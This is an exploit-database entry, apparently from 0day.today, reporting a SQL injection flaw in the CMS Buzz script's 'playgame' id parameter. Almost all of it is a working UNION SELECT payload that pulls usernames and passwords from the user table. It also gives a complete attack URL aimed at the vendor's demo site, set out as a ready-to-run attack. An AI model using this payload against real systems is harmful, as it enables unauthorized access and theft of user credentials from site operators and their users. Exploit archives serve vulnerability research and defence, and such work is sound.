id: 3628
date: 09/08/2008
title: CMS Buzz (id) Remote SQL Injection Vulnerability
author: 0day Today Team
cves: 

================================================
CMS Buzz (id) Remote SQL Injection Vulnerability
================================================


#################################################################################################
#################################################################################################
###                                                                                           ###
### Script Name : cmsbuzz                                                                     ###
###                                                                                           ###
### download    : http://cmsbuzz.com/purchase.php                                             ###
#################################################################################################
#################################################################################################
###                                                                                           ###
### d0rk ::  "use your mind"                                                                  ###
###                                                                                           ###
###                                                                                           ###
### -(:: sql Code ::)-                                                                        ###
###        ?action=playgame&id=(sql)                                                          ###
###(sql)=-6+union+select+1,2,3,concat_ws(0x3a3a,username,upasswd),5,6,7,8,9,10,11,12,13+from+tbl_userprofile--                           
###                                                                                           ###
#################################################################################################
###                                                                                           ###
### -(::  l!ve demo ::)-                                                                      ###
###                                                                                           ###
###http://demo.cmsbuzz.com/?action=playgame&id=-6+union+select+1,2,3,concat_ws(0x3a3a,username,upasswd),5,6,7,8,9,10,11,12,13+from+tbl_userprofile--
###                                                                                           ###
###                                                                                           ###
########################                                                    #####################
########################                                                    #####################
#################################################################################################
#################################################################################################



#  0day.today [2023-03-22]  #